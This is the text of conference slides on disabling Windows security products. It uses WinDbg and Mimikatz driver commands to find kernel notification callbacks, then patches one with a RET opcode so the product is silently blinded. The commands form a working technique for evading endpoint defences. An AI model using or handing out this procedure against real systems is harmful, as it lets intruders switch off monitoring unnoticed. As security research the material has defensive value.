More Related Content Similar to Killing any security product … using a Mimikatz undocumented feature (20) More from Cyber Security Alliance (20) Killing any security product … using a Mimikatz undocumented feature2. How to write a security product for Windows?
“There is only one way to do it”
… since Windows Vista
3. How to write a security product for Windows?
ObRegisterCallbacks
PsSetCreateProcessNotifyRoutine (process)
PsSetCreateProcessNotifyRoutineEx
PsSetCreateThreadNotifyRoutine (thread)
PsSetCreateThreadNotifyRoutineEx
PsSetLoadImageNotifyRoutine
CmRegisterCallback (registry)
CmRegisterCallbackEx
FltRegisterFilter (file)
FltStartFiltering
4. Finding process callbacks with WinDbg
kd> dd nt!PspCreateProcessNotifyRoutineCount l1
fffff800`02a821a4 00000005
kd> dd nt!PspCreateProcessNotifyRoutineExCount l1
fffff800`02a821a0 00000002
kd> dp nt!PspCreateProcessNotifyRoutine l8
fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff
fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff
fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f
fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
5. Other callbacks
kd> dd nt!PspCreatethreadNotifyRoutineCount l1 <<< Thread
fffff800`02a81f80 00000000
kd> dd nt!PspLoadImageNotifyRoutineCount l1 <<< Image load
fffff800`02a81d60 00000002
kd> dp nt!PspLoadImageNotifyRoutine l3
fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf
fffff800`02a81d30 00000000`00000000
kd> dd nt!CmpCallBackCount l1 <<< Registry
fffff800`02a63b04 00000001
kd> x nt!CallbackListHead
fffff800`02ad8970 nt!CallbackListHead = <no type information>
7. Magic command #1
mimikatz # !+
[*] mimikatz driver not present
[+] mimikatz driver successfully registered
[+] mimikatz driver ACL to everyone
[+] mimikatz driver started
8. Magic command #2
mimikatz # !notifObject
...
* Process
* Callback [type 3]
PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0]
Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300]
Close - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010]
Delete - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0]
Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0]
...
9. Back in WinDbg
kd> e ehdrv+0x0001c6e0 c3
0xC3 == RET opcode
After this patch, the notification callback will do nothing
Unlinking from the callbacks list is also doable
● Requires more work ...
● … but is less detectable (no code alteration)
10. Conclusion
Cons
● You need kernel write access
○ Being able to write a single NULL byte is enough,
though
Pros
● Will kill any security tool
● The software will still be “active and running” from a
monitoring point of view - just not being notified